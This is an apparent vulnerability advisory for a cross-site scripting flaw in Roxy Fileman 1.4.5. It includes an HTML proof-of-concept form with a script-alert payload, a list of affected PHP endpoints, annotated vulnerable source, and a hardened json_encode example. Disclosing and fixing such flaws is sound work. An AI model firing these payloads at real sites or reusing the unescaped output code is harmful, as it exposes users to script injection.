Roxy Fileman Cross Site Scripting

Published: 2017.01.13
Credit: Ashiyane Digital Security Team
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes

*=============================================================|
| Exploit Title: Roxy Fileman Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.roxyfileman.com/
|
| Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php
|
| Version : V 1.4.5
|
| Platform : PHP
|
| Tested on: Kali Linux
|
| Date: 1/12/2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
| <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
| <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/>
|</form>
|</BODY>
|</HTML>
|
*=======================|
| vulnerability Method : GET & POST
| Files that have this vulnerability :
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
|How to fix this vulnerability :
|
|You should first filter all input variables, and only then use echo in the script :)
|
*=======================|
|Vulnerable code For Example (fileman/php/fileslist.php):
|
|<?php
|include '../system.inc.php';
|include 'functions.inc.php';
|
|verifyAction('FILESLIST');
|checkAccess('FILESLIST');
|
|// $path is taken directly from the POST parameter "d" whenever it is non-empty
|$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
|$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
|if($type != 'image' && $type != 'flash')
|  $type = '';
|verifyPath($path);
|
|$files = listDirectory(fixPath($path), 0);
|natcasesort($files);
|$str = '';
|// nothing in this file sets a Content-Type header before the body is echoed
|echo '[';
|foreach ($files as $f){
|  // the user-controlled $path is concatenated into every entry
|  $fullPath = $path.'/'.$f;
|  if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
|    continue;
|  $size = filesize(fixPath($fullPath));
|  $time = filemtime(fixPath($fullPath));
|  $w = 0;
|  $h = 0;
|  if(RoxyFile::IsImage($f)){
|    $tmp = @getimagesize(fixPath($fullPath));
|    if($tmp){
|      $w = $tmp[0];
|      $h = $tmp[1];
|    }
|  }
|  // only the double quote is escaped; < > & ' and the backslash are echoed as-is
|  $str .= '{"p":"'.mb_ereg_replace('"', '\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
|}
|$str = mb_substr($str, 0, -1);
|echo $str;
|echo ']';
|?>
*=============================================================|
| Special Thanks To : Ehsan Cod3r ، micle ، Und3rgr0und ، Amir.ght ،
| xenotix، modiret، V For Vendetta ، Alireza ، r4ouf ، Spoofer ،
| And All Of My Friends ، The Last One : My Self, M.R.S.L.Y
*=============================================================|
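As an added illustration of the fix section (not code from the advisory or from Roxy Fileman): the concatenation pattern from fileslist.php beside a hardened variant that delegates escaping to json_encode and declares the response type. The function names and the sample directory listing are constructed for this example; mb_ereg_replace needs the mbstring extension, as on the page.

```php
<?php
// Added example, not code from the advisory or from Roxy Fileman.
// Function names and the directory listing below are constructed for this demo.

// Vulnerable pattern (mirrors fileslist.php): the user-controlled path is
// concatenated into hand-built JSON with only the double quote escaped.
// Requires the mbstring extension, as the original code does.
function buildListingVulnerable(string $path, array $files): string
{
    $str = '';
    foreach ($files as $f) {
        $fullPath = $path . '/' . $f;
        $str .= '{"p":"' . mb_ereg_replace('"', '\"', $fullPath) . '"},';
    }
    return '[' . mb_substr($str, 0, -1) . ']';
}

// Hardened variant: json_encode performs the escaping, and the JSON_HEX_*
// flags turn < > & ' " into \uXXXX so the body carries no HTML markup even
// if a browser is tricked into rendering it as a document.
function buildListingHardened(string $path, array $files): string
{
    $entries = [];
    foreach ($files as $f) {
        $entries[] = ['p' => $path . '/' . $f];
    }
    return json_encode(
        $entries,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// The response should also declare its type so the listing is never
// interpreted as HTML; call this instead of echoing the raw string.
function sendListingHardened(string $path, array $files): void
{
    header('Content-Type: application/json; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo buildListingHardened($path, $files);
}

// Constructed input in the spirit of the advisory payload: a path that
// closes the string context and carries a script tag.
$path  = '/fileman/Uploads"><script>alert(1)</script>';
$files = ['a.jpg', 'b.png'];

echo "vulnerable: ", buildListingVulnerable($path, $files), PHP_EOL;
echo "hardened:   ", buildListingHardened($path, $files), PHP_EOL;
```

Running it from the command line prints the script tag intact in the first line and as \u003Cscript\u003E in the second, which is the difference a reflected-XSS check on this endpoint should look for.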
Copyright 2017, cxsecurity.com